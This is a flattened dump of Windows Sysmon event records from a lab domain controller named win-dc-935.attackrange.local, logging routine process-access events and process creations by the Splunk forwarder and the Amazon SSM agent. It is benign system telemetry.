13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002099Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002097Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4A00-000000009101}3972C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002096Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.148{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8552-5FCF-4A00-000000009101}3972C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002095Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.149{10ACEC4A-8553-5FCF-5600-000000009101}3972C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002094Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.144{10ACEC4A-8553-5FCF-5500-000000009101}40003952C:\Windows\system32\conhost.exe{10ACEC4A-8553-5FCF-5400-000000009101}2788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002093Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.139{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8553-5FCF-5500-000000009101}4000C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002092Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.137{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002091Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.137{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002090Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.137{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002089Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.137{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002088Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.137{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002087Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.137{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002086Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.136{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.136{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002084Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.136{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002083Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.136{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8553-5FCF-5400-000000009101}2788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002082Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.136{10ACEC4A-8551-5FCF-3000-000000009101}15482668C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{10ACEC4A-8553-5FCF-5400-000000009101}2788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000002081Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.136{10ACEC4A-8553-5FCF-5400-000000009101}2788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPSignedDriver | Where-Object { $_.DeviceID -eq 'XENBUS\VEN_XS0001&DEV_VBD&REV_00000001\_' -or $_.DeviceClass -eq 'Net' -and ( $_.Manufacturer -like 'Intel*' -or $_.Manufacturer -eq 'Citrix Systems, Inc.' -or $_.Manufacturer -eq 'Amazon Inc.' -or $_.Manufacturer -eq 'Amazon Web Services, Inc.' )}" "| Select-Object" "Description, DriverVersion" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000002080Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002079Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.055{10ACEC4A-8552-5FCF-5300-000000009101}27242620C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002283Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8554-5FCF-6200-000000009101}2620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002282Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.961{10ACEC4A-8554-5FCF-6200-000000009101}26203948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002281Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8554-5FCF-6200-000000009101}2620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002280Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002279Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002278Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.711{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002277Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 